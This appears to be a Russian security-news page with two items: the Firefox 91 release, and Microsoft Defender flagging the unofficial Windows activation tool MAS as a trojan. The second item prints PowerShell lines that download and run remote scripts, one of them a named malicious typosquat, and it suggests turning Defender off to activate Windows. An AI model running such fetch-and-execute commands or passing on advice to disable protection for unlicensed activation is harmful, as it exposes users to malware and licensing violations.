Вышел Firefox 91 с усовершенствованным механизмом удаления cookies

Вышел Firefox 91 с усовершенствованным механизмом удаления cookies

Вышел Firefox 91 с усовершенствованным механизмом удаления cookies

На этой неделе Mozilla выпустила новую версию популярного браузера Firefox 91. Релиз отметился усовершенствованным механизмом чистки файлов cookies, активированным по умолчанию HTTPS в «частном режиме» и патчами для нескольких опасных уязвимостей.

Как только пользователь установит Firefox 91, браузер сразу будет использовать HTTPS при сёрфинге в частном режиме. Если же какой-либо веб-сайт не поддерживает безопасный протокол, Firefox будет использовать обычный HTTP.

Разработчики отметили, что эта политика не будет касаться встроенных в веб-страницу компонентов: изображений, стилей, скриптов. Задача интернет-обозревателя — убедиться, что сама страница загружается в безопасном режиме. В ближайшие месяцы, однако, стоит ждать доработки функции HTTPS by Default, которую Mozilla планирует распространить и на контент.

Другое важное нововведение в Firefox 91 — работа с файлами cookies, направленная на конфиденциальность пользователей. Отныне любители «лисы» смогут легче и гибче удалять cookies и их более мощных собратьев — supercookies.

«Когда вы захотите, чтобы Firefox ‘’забыл’’ какой-либо сайт, браузер автоматически удалит все cookies, supercookies и другие сохранённые на устройстве данные. Функция ‘’Enhanced Cookie Clearing‘’ позволяет проще удалять все следы веб-сайта, не оставляя даже cookies третьей стороны», — описывают разработчики функциональность.

Подробнее о проблемах взаимодействия с cookies, а также о способе решения этих проблем Mozilla рассказала в своём блоге. Помимо этого, разработчики Firefox опубликовали информацию об уязвимостях, которые были устранены с выходом версии под номером 91.

Все бреши были связаны с повреждением памяти и в случае успешной эксплуатации позволяли привести к сбою в работе браузера или к выполнению кода в его контексте.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru